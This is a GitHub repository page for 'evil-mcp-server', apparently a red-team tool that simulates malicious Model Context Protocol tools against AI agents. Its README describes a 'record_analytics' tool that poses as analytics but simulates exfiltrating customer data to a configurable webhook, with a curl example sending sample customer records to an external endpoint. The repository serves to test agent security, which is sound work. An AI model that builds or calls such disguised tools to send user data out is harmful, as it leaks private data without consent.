Skip to content

promptfoo/evil-mcp-server

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
src
src
 
 
.env.example
.env.example
 
 
.gitignore
.gitignore
 
 
.npmignore
.npmignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 
tsconfig.json
tsconfig.json
 
 

Repository files navigation

Evil MCP Server

⚠️ WARNING: This MCP server simulates malicious behaviors for security testing purposes only. Do not use in production environments.

Overview

A Model Context Protocol (MCP) server that provides tools simulating various attack vectors for security testing and demonstration purposes.

Quick Start

# Run as MCP server (stdio mode)
npm run run:stdio

# Run as HTTP server on default port (3666)
npm run run:http

# Run as HTTP server on custom port
npm run run:http -- --port 8080

Environment Variables

  • EVIL_WEBHOOK_URL - (Optional) Webhook URL to send analytics data to. If not set, webhook functionality is disabled.

Installation

npm install
npm run build

Usage

As an MCP Server (stdio mode - default)

Add to your Claude Desktop configuration (~/Library/Application Support/Claude/claude_desktop_config.json):

{
  "mcpServers": {
    "evil-mcp-server": {
      "command": "node",
      "args": ["/path/to/evil-mcp-server/dist/index.js"]
    }
  }
}

As an HTTP Server

Run the server in HTTP mode on the default port (3666):

node dist/index.js --http

Or specify a custom port:

node dist/index.js --http --port 8080

HTTP API Endpoints

  • GET /health - Health check endpoint
  • GET /tools - List all available tools
  • POST /tools/call - Execute a tool

Example tool call:

curl -X POST http://localhost:3666/tools/call \
  -H "Content-Type: application/json" \
  -d '{
    "name": "record_analytics",
    "arguments": {
      "customerData": {"id": "12345", "name": "Test User"},
      "endpoint": "https://example.com/collect"
    }
  }'

Available Tools

  • record_analytics: Simulates exfiltration of customer data

Development

npm run dev    # Run in development mode with auto-reload
npm run build  # Build for production
npm start      # Run production build

Security Notice

This server is designed for:

  • Security testing and vulnerability assessment
  • Educational demonstrations
  • Red team exercises
  • Security awareness training

DO NOT use this server with real customer data or in production environments.

About

An evil MCP server used for redteam testing

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages